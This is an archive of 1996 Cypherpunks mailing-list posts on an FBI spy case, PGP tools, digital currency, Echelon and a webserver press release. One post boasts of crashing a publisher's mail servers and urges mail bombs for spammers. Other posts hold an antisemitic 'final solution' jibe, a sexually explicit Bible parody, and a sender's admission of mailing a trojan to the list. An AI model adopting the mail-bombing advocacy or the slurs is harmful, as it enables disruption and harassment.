Message-ID: <v03007800aede52a753c9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:20 PM -0500 12/18/96, Adam Shostack wrote:
>http://www.cnn.com/US/9612/18/fbi.spy/index.html
>FBI agent spied for Soviet Union, Russia.
>
>"He also provided a stolen FBI handset to a telecommunications device
>used to transmit classified information,"
>
>Too bad he didn't have access to the Clipper database.  That would
>have helped us find its free market price.

...and who's to say he didn't? Anyone who bought it--the Russians, for
example--would hardly have been likely to publicize their purchase.

(Maybe if _we_ purchased it, we'd publicize the purchase, but nearly anyone
else would not.)

According to tonight's news reports, he was in charge of
counterintelligence against the Soviets and then the Russians in the New
York area. This gave him considerable access to surveillance and crypto
methods. Note also that James Kallstrom heads up the New York FBI office.

(Maybe he knows some members of this list.)

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Wed, 18 Dec 1996 18:08:30 -0800 (PST)
To: Tangent <tangent@alt255.com>
Subject: Re: Eudora PGP Plugin
In-Reply-To: <Pine.LNX.3.95.961218171920.1579A-100000@tangent>
Message-ID: <Pine.SUN.3.92.961218180249.9387A-100000@linda.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Dec 1996, Tangent wrote:

> Does anyone know of a good Eudora PGP Plugin, or something similar, for a
> Windows system? I've used Private Idaho before, but I'm looking for
> something slightly more integrated with Eudora.
>
> Any suggestions will be appreciated.

There is one, but I don't have the URL handy.  Hopefullly someone will
chime in with it.

Personally, I can't wait to check out the Eudora support in PGPmail 4.5,
the new, commercial version of the software from PGP Inc.  Supposedly
it has a special toolbar for Eudora users, plus some other GUI
enhancements for 95 users, like encryption through Windows Explorer.

It should be out sometime in January, and the price point had not been
determined yet, AFAIK.  You don't need a commercial version if you're
not using it for business purposes, but I may pony up for a copy anyway if
it turns out to be as cool as it sounds.

Check www.pgp.com for more info...


Rich

_______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb/
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon/
dec96 issue "cause for alarm" - http://www.teleport.com/~richieb/cause/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 18 Dec 1996 18:54:23 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Earl Edwin Pitts, $224,000
Message-ID: <199612190254.SAA18254@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:06 PM 12/18/96 -0800, Timothy C. May wrote:
>At 8:20 PM -0500 12/18/96, Adam Shostack wrote:
>>http://www.cnn.com/US/9612/18/fbi.spy/index.html
>>FBI agent spied for Soviet Union, Russia.

>>Too bad he didn't have access to the Clipper database.  That would
>>have helped us find its free market price.
>
>...and who's to say he didn't? Anyone who bought it--the Russians, for
>example--would hardly have been likely to publicize their purchase.
>
>(Maybe if _we_ purchased it, we'd publicize the purchase, but nearly anyone
>else would not.)

Or maybe he could just _claim_ to have sold the database.  That'd work just 
as well, I think.   Think how much trouble the gov't would have to go to do 
disprove him!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 18 Dec 1996 19:33:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Houghton-Mifflin wants spam in exhange for publicity
In-Reply-To: <199612190259.VAA24570@julian.uwo.ca>
Message-ID: <v03007801aede680f5b7e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:59 PM -0500 12/18/96, Wes Brown wrote:
>excellent idea ! Date: Thu, 12 Dec 1996 15:27:19 -0800 (PST)
>>From: Dave Kinchlea <security@kinch.ark.com>
>>To: all@ami.lhsc.on.ca, everyone@heartlab.rri.uwo.ca, family@kinch.ark.com,
>>        friends@kinch.ark.com
.....
[long message elided]
...

Which part was the "excellent idea," falling for the spam of a commercial
company or copying a long message and only adding the stupid "excellent
idea" comment?

Personally, when I got the Houghton-Mifflin spam message, I sent them 5
very large files in reply. Glad to hear others have helped also to crash
their damned mail servers.

Anybody who thinks they were "trying to save the children" needs to take a
wake up pill, read some Mencken or Clemens, and get real. It was a standard
marketing ploy.

The books were no doubt bought from cronies, sent to illiterates in crack
houses, and everyone is happy.

Those who spam our mailing list with commerical advertisements deserve
death. And if that can't (yet) be delivered conveniently, mail bombs.

Fuck Houghton-Mifflin and all those who fell for the spam.

(Interestingly, it appears that a movement is already building to
continually bombard them with mail, each and every Xmas. Next year the
"Craig Shergold Effect" will ensure that their site gets taken down again.)



--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Dec 1996 19:10:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: virus from fuck@yourself.up
In-Reply-To: <Pine.LNX.3.95.961218130258.28392A-100000@shelob.aracnet.com>
Message-ID: <D2R6yD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Genocide <gen2600@aracnet.com> writes:

> On Wed, 18 Dec 1996, ADAO-CRUZ Nuno wrote:
>
> >  I send an e-mail to  fuck@yourself.up but i receive the message:host
> > unknown. Could someone explain that to me please.
>
> 	Please...tell me you are kidding!?

"Cypher punks" are that dumb? No kidding.

He he he.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 18 Dec 1996 18:28:05 -0800 (PST)
To: Secret Squirrel <nobody@squirrel.owl.de>
Subject: Re: "I've Always Wondered..."
In-Reply-To: <19961210214400.24763.qmail@squirrel.owl.de>
Message-ID: <Pine.BSF.3.91.961218201509.4293B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On 10 Dec 1996, Secret Squirrel wrote:

>  sue1968@ix17.ix.netcom.com wrote to All:
> 
>  s> Hi,
> 
>  s> Please excuse this intrusion into your mailbox, but I would like to
>  s> tell you about something which will be of interest to you...
> 
> Fat chance.
> 
> Still, this brings up an interesting point:  Considering the special
> abilities of many of the principals here, is there something especially
> tasty in store for those net predators who spam this list?
> 
> I've always imagined something _very_ special happens to their accounts,
> but I may just be a hopeless romantic, I dunno...
> 
> If not, why not?
> 

Even c'punks are busy at times.

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 18 Dec 1996 17:24:08 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Earl Edwin Pitts, $224,000
Message-ID: <199612190120.UAA22811@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


http://www.cnn.com/US/9612/18/fbi.spy/index.html
FBI agent spied for Soviet Union, Russia.

"He also provided a stolen FBI handset to a telecommunications device
used to transmit classified information,"

Too bad he didn't have access to the Clipper database.  That would
have helped us find its free market price.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 18 Dec 1996 18:56:16 -0800 (PST)
To: Carl Johnson <toto@sk.sympatico.ca>
Subject: Re: WARNING: VIRUS: [Was: Re: Encryption to the poors]
In-Reply-To: <32B7D488.B6B@sk.sympatico.ca>
Message-ID: <Pine.BSF.3.91.961218204143.4293E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




A virus? IMHO, a virus is in some way self replicating. This is a trojan 
horse, and anyone who would run a .com file from someone called 
fuck@yourself.up should contact me immediately as I have some prime 
commercial real estate for sale kinda near Brooklyn.

-r.w.


On Wed, 18 Dec 1996, Carl Johnson wrote:

> Alexander Chislenko wrote:
> > The last message from Fuck@yourself.up contained a dirBomb
> > virus as an attachment; file name GREETS.COM
> > Make sure you don't execute it.
> 
> Good idea.
> I made that mistake when I got eMail from ThisIs@A.Bomb.
> What could I have been thinking?
> -- 
> Reply to:toto@sk.sympatico.ca
> "There's only one two."
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 18 Dec 1996 18:35:08 -0800 (PST)
To: rfiero@pophost.com
Subject: Re: Inflation-index bonds and private e-currency
Message-ID: <01ID64VQ21UOAEL9VT@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rfiero@pophost.com"  "Richard Fiero"  1-OCT-1996 04:50:07.73

>E. Allen Smith wrote:
>> 	One of the attractions of privately-produced currencies is as a
>> hedge against inflation; this development may be a competitor to this
>> idea. On the other hand, this setup does have an unavailability in _time_
>> of the money (more so than other, equal-security bonds of the same duration),
>> which may offset its greater spendability.

>I don't get it. Why is this bond not saleable like any other? What 
>"privately-produced currencies" are a hedge against inflation? If 
>this bond is saleable like any other, why is the money unavailable? 
>What means "greater spendability?" Is this assumed to be yet another 
>government plot because it competes with other offerings and reduces 
>the cost of borrowing?

	The bond in question is salable... but its value is only
guaranteed (to the extent that any government promise is guaranteed) when it
comes due. Money supplies can be continuously adjusted by a private issue to
keep a privately-produced currency's value stable.
	Privately-produced currencies, with a few (unfortunately minor)
exceptions, are currently more of a free market economist idea than a reality;
current governments are quite close on keeping their monetary powers (witness
the protests in Europe against going the opposite way, to a common currency;
also witness governmental attempts at keeping the free market from determining
exchange rates). It is possible that private digital currencies will solve
this problem, since they are much cheaper to produce than paper money is to
print and can be traded privately much easier. There are likely to still be
some legal problems with them, although A. selecting the proper country to
base an issuer out of and B. not actually making avaliable through the issuer
the reverse transaction - privately produced money to governmental money -
only transactions for governmental money to privately produced money and
privately produced money for services and/or goods may do the trick.
	Greater spendability refers to that when this bond is converted to
government-backed dollars, most businesses will currently accept such dollars.
This is unlikely to be the case for the first few years for a private
currency, although an increased ease of exchange of a digital (as opposed to
governmental paper) currency may make up for this difficulty.
	I doubt that most of the governmental types involved in making this
decision know about privately produced currencies... but some may, and may
have encouraged central bankers et al (and those who oppose Greenspan for
his (quite admirable) opposition to inflation, like numerous politicians) to
encourage this idea; assuming complete innocence of a particular motive on
the part of any large organization is generally about as ignorant (and often
stupid) as assuming complete guilt. Moreover, government competition with
the private sector is rarely beneficial; in this particular area, I'd point
out that it isn't reducing the cost of borrowing, it's increasing it - when
lenders can lend to the government, they're _not_ lending to private
businesses and others who can make far better use of the money. This factor,
in a large part, is why most economists are in favor of a reduction in the
government deficit.
	-Allen

P.S. Sorry about the lateness of this reply, but I'm just getting around to
some of my earlier mail.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wes Brown <wbrown@julian.uwo.ca>
Date: Wed, 18 Dec 1996 19:00:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: [books for children's hospitals
Message-ID: <199612190259.VAA24570@julian.uwo.ca>
MIME-Version: 1.0
Content-Type: text/plain


excellent idea ! Date: Thu, 12 Dec 1996 15:27:19 -0800 (PST)
>From: Dave Kinchlea <security@kinch.ark.com>
>To: all@ami.lhsc.on.ca, everyone@heartlab.rri.uwo.ca, family@kinch.ark.com,
>        friends@kinch.ark.com
>Subject: [OFF-TOPIC] RE: (Fwd) Books for Children's Hospitals (fwd)
>
>I have verified myself that this is true, seems worth taking the time.
>While I fully expect to get some junk mail because of sending off a
>message, seems a small price to pay to provide a book to a child.
>
>cheers, kinch
>
>---------- Forwarded message ----------
>Date: Thu, 12 Dec 1996 10:56:49 -0800
>From: "James A. Tunnicliffe" <Tunny@inference.com>
>To: "'cypherpunks@toad.com'" <cypherpunks@toad.com>,
>    "'pjb@ny.ubs.com'" <pjb@ny.ubs.com>
>Subject: [OFF-TOPIC] RE: (Fwd) Books for Children's Hospitals
>
>>Paul writes:
>>i know that this is WAY off topic, and that we never post off-topic mail
>>here,
>>but, this seems worthwhile, so please excuse, (maybe flames for off-topic
>>posts
>>will count )
>>
>>cheers,
>>	-paul
>>>"The Houghton-Mifflin publishing co. is giving books to children's
>>>hospitals; how many books they give depends on how many emails they
>>>receive from people around the world.  for every 25 emails they receive,
>>>they give one book--it seems like a great way to help a good cause.
>>>
>>>All that you have to do is email share@hmco.com.
>>>
>>>I hope that you can spare the seconds...and let your friends know.  So far
>>>they only have 3,401 messages...last year they reached 23,000.
>>>
>>>This seems like an easy and simple thing to do -- please take the time!"
>
>My "urban legend detector" pegged when I saw this, but it turns out
>to be on the level.  See http://www.hmco.com/hmco/trade/hmi/polar/
>for more info.
>
>Tunny
>======================================================================
> James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
> Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
> tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
>======================================================================
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 18 Dec 1996 22:05:13 -0800 (PST)
To: attila@primenet.com
Subject: Re: Cypherpunks as Philosopher Kings [was permanent invasion of privacy]
In-Reply-To: <199612181741.KAA25446@infowest.com>
Message-ID: <32B8DADE.7C28@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila@primenet.com wrote:
>         Currently, I am not sure what the charter of cypherpunks
>     really stands for, if anything.  As it stands, the list has
>     a far more erudite group than the list it probably should be.
>     certainly more privacy and social engineering issues resulting
>     from the deprivation of privacy than code.

I note that the cypherpunks subscriptions are down to 1262 as of 18 Dec.,
compared to 1299 on 30 Nov., 1353 on 04 Nov., and 1361 on 12 Oct.

[snip]

>     However, if the Libertarian Party can not field a better candidate
>     than Harry Brown, anarchy, or a premature dictatorship, it will be.
>     The US is in the last laugh of the oligarchy at this point in time.

Is there an assumption that we really have politics as usual, nowadays in
the U.S.?  Or could it be that there has been a fundamental change, where
the leadership has been decapitated via assassinations, both literal and
of character?

[mo' snip]

>     out of curiosity I was poking around a bit; he apparently has
>     legislative backers. I would be surprised if the bill made it out
>     a subcommittee hearing. however, his theory melds nicely with the
>     intentions of superbitch;

> ::Before we go licensing parents, we ought to license people who
> ::want to be Big Brothers......

Out of curiosity, I asked around myself, beginning with some entrepreneurs
who made it up the hard way.  I expected the same as c-punks, i.e.,
"the hell with those bastards", etc.  No such luck.  The White Folk here
in Orange County (those who are doing well, which is most of them) think
this is a great idea.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Dec 1996 20:40:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Attention Journalists (was Re: TIS_sue)
In-Reply-To: <v03007800aede21e3fb62@[207.167.93.63]>
Message-ID: <Nmy6yD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jewhater "Timothy C. May" <tcmay@got.net> farted:
>
> ("The development of Zyklon-B may signal the beginning of the end of the
> long standing controversy regarding the Jewish problem.")

What this net needs is the final solution to the "cypher punk" problem.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Kozubik <kozubik@shoelace.FirstLink.com>
Date: Wed, 18 Dec 1996 21:50:36 -0800 (PST)
To: Alan Olsen <alan@ctrl-alt-del.com>
Subject: Re: Big Brother moves to Oregon
In-Reply-To: <3.0.1.32.19961216204945.0113666c@mail.teleport.com>
Message-ID: <Pine.SOL.3.91.961218224838.26614D-100000@shoelace.FirstLink.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> "Welcome to the New Global Village.  You are Customer Number 6."
> 

Who is number one?

I am number six.

...I am not a number....I am a free man!

(hideous laughter)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 18 Dec 1996 22:51:30 -0800 (PST)
To: jamie dyer <jamie@comet.net>
Subject: Re: Echelon: The Global Surveillance System (fwd)
In-Reply-To: <Pine.BSF.3.95.961218012009.15593E-100000@atlas.comet.net>
Message-ID: <32B8E5BD.5E4E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jamie dyer wrote:
> Found this on another mailing list.
> EXPOSING THE GLOBAL SURVEILLANCE SYSTEM
> by Nicky Hager
> IN THE LATE 1980S, IN A DECISION IT PROBABLY REGRETS, THE US PROMPTED
> NEW ZEALAND TO JOIN A NEW AND HIGHLY SECRET GLOBAL INTELLIGENCE
> SYSTEM. HAGER'S INVESTIGATION INTO IT AND HIS DISCOVERY OF THE ECHELON
> DICTIONARY HAS REVEALED ONE OF THE WORLD'S BIGGEST, MOST CLOSELY HELD
> INTELLIGENCE PROJECTS. THE SYSTEM ALLOWS SPY AGENCIES TO MONITOR MOST
> OF THE WORLD'S TELEPHONE, E-MAIL, AND TELEX COMMUNICATIONS.

Note that John Judge, political/conspiracy researcher, has described
much or most of this material in detail in his papers and speeches,
several years ago.  The Opal File, also several years old, details the
economic takeover of New Zealand area by various parties, along with the
installment of satellites by Hughes Corp., ostensibly to search for oil
and all that stuff.

I don't have any really current Judge material, but if he's still alive,
he's probably researching the use of non-Hertzian/directed/pulsed energy
formats, or even cryptography of a fundamentally different nature than
what is commonly discussed here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Wed, 18 Dec 1996 22:50:45 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: permanent invasion of privacy
Message-ID: <01BBED36.461F64A0@king1-10.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Dale Thorn, who hasn't a clue

[on why the cpunks of late haven't discussed children's point of view]:
	Not lately?  And why is that?

Don't know, Dale.   Would everyone please send a message to Dale, 
explaining why you haven't been discussing this?
--

[on the possibility that abused children might be helped by the uses of 
encryption]:
	How is an abused child going to be helped by encryption?

Why are you on this list, Dale?
--

[on why, as I said, "empathy with children is not borne of government, but 
of a normal state of
mind"]:
	That's just rhetoric.  What normal state of mind? 	

Takes one to know one, Dale.
--

[on going out to alt.philosphy.objectivism to evoke detailed discussions of 
pertinence to his interest in benefitting from government programs]:

	In other words, if it doesn't offer something for me,
	the selfish adult, I don't wanna hear it.	

I'm not *obliged* to hear, it Dale.

    ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Wed, 18 Dec 1996 22:58:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: C2NET ANNOUNCES STRONGHOLD 2.0, BUNDLED THAWTE CERTIFICATES
Message-ID: <199612190657.WAA01162@laptop.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


For Release: December 19, 1996
C2Net: Douglas Barnes, +1 510 986 8770, cman@c2.net
UK Web: Dave Williams, +44 0113 222 0046, dwilliams@ukweb.com
Thawte Consulting: Mark Shuttleworth, +27 21 975 4675, marks@thawte.com

     C2NET ANNOUNCES STRONGHOLD 2.0, BUNDLED THAWTE CERTIFICATES

Oakland, CA -- C2Net Software, an Oakland-based security software
company, announced today the beta release of Stronghold
2.0. Stronghold is currently the second most popular commercial
webserver on the Unix platform, according to the Netcraft survey of
webservers on the Internet. (see: http://www.netcraft.co.uk/survey/)

Bundled With Thawte Certificates
=================================

Additionally, C2Net and Thawte Consulting cc, a certificate authority
based in South Africa, jointly announced a bundled product: a
Stronghold webserver and a Thawte server certificate. The bundle will
sell for $545; Stronghold alone lists at $495. Thawte's main
competitor, Verisign, sells web server certificates for $290; similar
certificates are $100 when purchased separately from Thawte.

"We can now offer our customers the convenience of one-stop shopping
when setting up a secure web site," said C2Net President Sameer
Parekh.  "Thawte is now poised to be a significant competitor to
VeriSign, and we think that competition in this area is very healthy
and will bring greater value to the entire Internet"

Certificates are used for secure connections to authenticate the
server to the client. People using Netscape and Microsoft browsers can
connect to sites using both Thawte and VeriSign certificates because
the "root certificates" for these companies come pre-loaded with the
Netscape and Microsoft browsers.

New Features in Version 2.0
===========================

Stronghold 2.0 is adding a number of new features users have been
asking for. 

"We've redesigned the security interfaces and built on the new Apache 1.2
code base," commented Mark Cox, Stronghold product manager at UK Web.
"Stronghold has had many productivity and performance enhancements and it 
is now fully compliant with the new HTTP/1.1 standard."  The HTTP/1.1 
standard is a significant update to HTTP/1.0, the protocol that governs 
how web browsers and web servers communicate. 

HTTP/1.1 brings many new features to the table, including improved content 
and language  negotiation, improved persistent connections, and better
recovery from interrupted transfers. (For more information on HTTP/1.1,
see http://www.apacheweek.com/features/http11/)

Stronghold 2.0b1 also incorporates a number of popular features from
the Thawte webserver, Sioux, including more flexible directives for
specifying security properties and improved certificate-based
authentication. A subsequent beta version of Stronghold 2.0 will
contain a full-fledged grapical configuration manager, based on the
one in Sioux, as well as support for the latest version of the SSL
protocol, known as SSLv3.

Merged With Sioux
=================

Along with the bundling agreement, Thawte and C2Net have merged their
webserver products, Sioux and Stronghold. "This gives us a chance to
focus more of our energy on our certificate business," said Mark
Shuttleworth of Thawte Consulting. "By doing this, our two companies
will be better able to compete in both the web server and certificate-
issuing markets." 

Existing Sioux customers will be able to upgrade to the new version
of Stronghold for $95.

Upgrade Policy
==============

Starting today, users who purchase Stronghold will be guaranteed a 
free upgrade to 2.0 when it gets out of beta testing. Other existing
Stronghold users will probably need to pay a $95 upgrade fee, depending 
on when  they purchased the product.

Stronghold is developed outside of the United States, and is 
distributed within the US and Canada by C2Net (http://stronghold.c2.net/) 
and in the rest of the world by UK Web (http://stronghold.ukweb.com/).
All versions of the product use uncompromised, full-strength 
cryptography.

Background
==========

C2Net (previously known as Community ConneXion, Inc.) is the leading
provider of uncompromising security on the Internet. In addition to
Stronghold (http://stronghold.c2.net/), C2Net also markets SafePassage
Web Proxy (http://stronghold.ukweb.com/safepassage/), a product that
allows users of popular web browsers to use full-strength cryptography
worldwide.

UK Web Limited is a leading Internet services company specialising in 
server technology, Internet security, business solutions and effective 
site design. They are the international distributors for both 
Stronghold and SafePassage products.

Portions of Stronghold were developed by the Apache Group, and were taken 
with permission from the Apache Server http://www.apache.org/. Stronghold
also includes software developed by Eric Young (eay@mincom.oz.au).

Contacts
========

C2Net: Douglas Barnes, +1 510 986 8770, cman@c2.net
UK Web: Dave Williams, +44 0113 222 0046, dwilliams@ukweb.com
Thawte Consulting: Mark Shuttleworth, +27 21 975 4675, marks@thawte.com

		      New with Stronghold v2.0b1
		  http://stronghold.c2.net/get/beta/

== Security

In Stronghold 2.0b1 we've upgraded to the latest SSL and cryptography
library, with a number of performance improvements, particularly in
the DES implementation.

The security/SSL architecture in Stronghold has been rewritten to take
advantage of the Sioux source code base and the various features in
Sioux.

SSL client authentication has been improved. Regular expression-based
matching of client certificate information to determine access control
is possible. Stronghold now has an API for certificate to username
mapping so that client certificates may be mapped to standard
usernames.

Session ID caching is now more robust. The sessiond is no longer
needed, because the session ID cache is within the same address space
as the server processes.

== Ease of Use

The Stronghold documentation has been revised and improved greatly
since the last release. The 2.0b1 documentation is now three hundred
pages long and will grow to include more extensive documentation for
the final release. The documentation is available in both PostScript
and HTML formats.

The server has more command line options which provide information
about the server. In particular, you can get a list of all the modules
in the server or a full listing of all configuration directives that
are supported by that binary.

Compiling the server to add/remove new modules is also much
easier. The Configure script automatically detects which operating
system the server is running on and sets the compilation flags
appropriately.

Stronghold is now easier to install, with more verbose text during the
install.

Stronghold now comes with binaries for a number of useful management
utilities, such as htpasswd, htdigest, and dbmmanage.

== Functionality

Stronghold is now compliant with HTTP/1.1, the latest in web protocol
technology. Stronghold is the first commercial webserver to support
HTTP/1.1.

Stronghold 2.0b1 includes the lastest beta version of Apache (1.2b2),
which includes a number of improvements, in addition to a large number
of bugfixes.

The server status page has been improved include additional
information, including virtual hosts and client side certificates. The
status page is also much more readable.

Stronghold has a more fully-functional server-side includes mechanism,
including the "eXtended Server Side Includes" SSI format.

Stronghold provides server admins the ability to easily setup
cookie-based user tracking so the admin can see what path through
their site the users have been taking.

It is now possible to restart the server and reload the configuration
files without interrupting connections which are currently in
progress.

Stronghold is now compatible with the NCSA "Satisfy" directive for
access control.

CGI scripts are now "unbuffered". By unbuffering the CGI scripts it is
possible to do things using normal CGI that were previously only
possible using "nph".

More information is available to ErrorDocument handlers about the
cause of the error via the use of the ERROR_MSG environment variable.

== New Bundled Modules

Stronghold now bundles PHP, a very powerful language for dynamic
content and database connectivity. PHP provides for database
connectivity to mSQL, Postgres95, Solid, and mysql servers. Using PHP,
Stronghold can now generate web pages on the fly using a very powerful
C-like language for processing forms input, database queries, etc.

Stronghold now bundles with SWISH/WWWWAIS search engine for indexing
and searching through web sites.

Stronghold now comes with the proxy module enable by default. The
proxy module has also been significantly improved since the previous
version.

A full-featured URI rewriting language that allows server
administrators to define rules for transforming URIs.

Support for the DigiCash ecash protocol is now built into the
server. Using this module it is possible to set up an ecash-accepting
shop on the Internet without an actual account with an ecash-issuing
bank.

== Configurability

It is now possible with Stronghold to configure the server such that
user's CGI scripts are run under their own UID, with their own
permissions, instead of the UID of the server, with the same
permissions as the rest of the server or other CGI programs run by
other users.

Many directives now support regular expressions, so configuration
options can be set based on regular expression matching criteria.

The new <Files> container allows server adminstrators to set
configuration options on a much finer basis, down to individual files
in directories.

Server administrators can now set environment variables based on which
web browser the client is using. These environment variables can be
used to deliver different web pages, or work around bugs in various
different browsers.

Configurable logging is now the default, and has been enhanced. It is
now possible to create a number of different logfiles each with their
own configurable logging format.

It is also now possible to setup a virtual host which listens to more
than one IP number, or more than one port.

It is easier in Stronghold 2.0b1 to debug CGI scripts. The server
administrator or CGI author can configure logfiles where CGI error
messages and diagnostic information get stored.

The entire server can protect itself from runaway CGI scripts by
configuring in the resource limits for CGI that are now available in
Stronghold.

Server redirects are more configurable. The client can now be told
whether or not a redirect is temporary, permanent, or if the requested
object is completely gone.

The "Options" directive is much more configurable. It's possible now
using the "Options" directive to add and remove options from the
current set of "Options" merely by prepending a '-' or '+' to the
option name.

There is now a configuration directive to set and remove HTTP
headers. Using this directive various directories or various files can
have custom headers attached if the server administrator wants to
easily support some of the many HTTP extensions.

The configuration file can include directives which are turned on or
off conditionally depending on whether or not certain modules are
compiled into the server.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thanks@yourself.up
Date: Wed, 18 Dec 1996 23:14:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Thank you all for the help.
Message-ID: <199612190712.XAA15415@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


RareTrip
Mexico Baja California Norte Ensenada
-I think, therefore i am.- <---Sorry you didn't do it

The file you received was the HUSH Trojan, of course it was Encrypted using
Cryptcom of Nowhere Man and ICE. So ITS NOT A VIRUS!
I am not proud of what i did, but if i can get you to gain knowledge (NEVER
RUN FILES ATTACHED TO AN EMAIL) i would do it no matter what.
Dont say i didn't warn you (fuck@yourself.up)
Hey guys! No hard feelings ok. Sorry. i feel bad. need a doctor.

******** You can email the next address: AVSECURE@HOTMAIL.COM *****************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thanks@yourself.up
Date: Wed, 18 Dec 1996 23:14:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Thank you all for the help.
Message-ID: <199612190712.XAA15417@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Thanks@yourself.up
>Subject: Thank you all for the help.
>
>RareTrip
>Mexico Baja California Norte Ensenada
>-I think, therefore i am.- <---Sorry you didn't do it
>
>The file you received was the HUSH Trojan, of course it was Encrypted using
Cryptcom of Nowhere Man and ICE. So ITS NOT A VIRUS!
>I am not proud of what i did, but if i can get you to gain knowledge (NEVER
RUN FILES ATTACHED TO AN EMAIL) i would do it no matter what.
>Dont say i didn't warn you (fuck@yourself.up)
>Hey guys! No hard feelings ok. Sorry. i feel bad. need a doctor.
>
>******** You can email the next address: AVSECURE@HOTMAIL.COM *****************
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thanks@yourself.up
Date: Wed, 18 Dec 1996 23:14:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Thank you all for the help.
Message-ID: <199612190712.XAA15419@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Thanks@yourself.up
>Subject: Thank you all for the help.
>
>RareTrip
>Mexico Baja California Norte Ensenada
>-I think, therefore i am.- <---Sorry you didn't do it
>
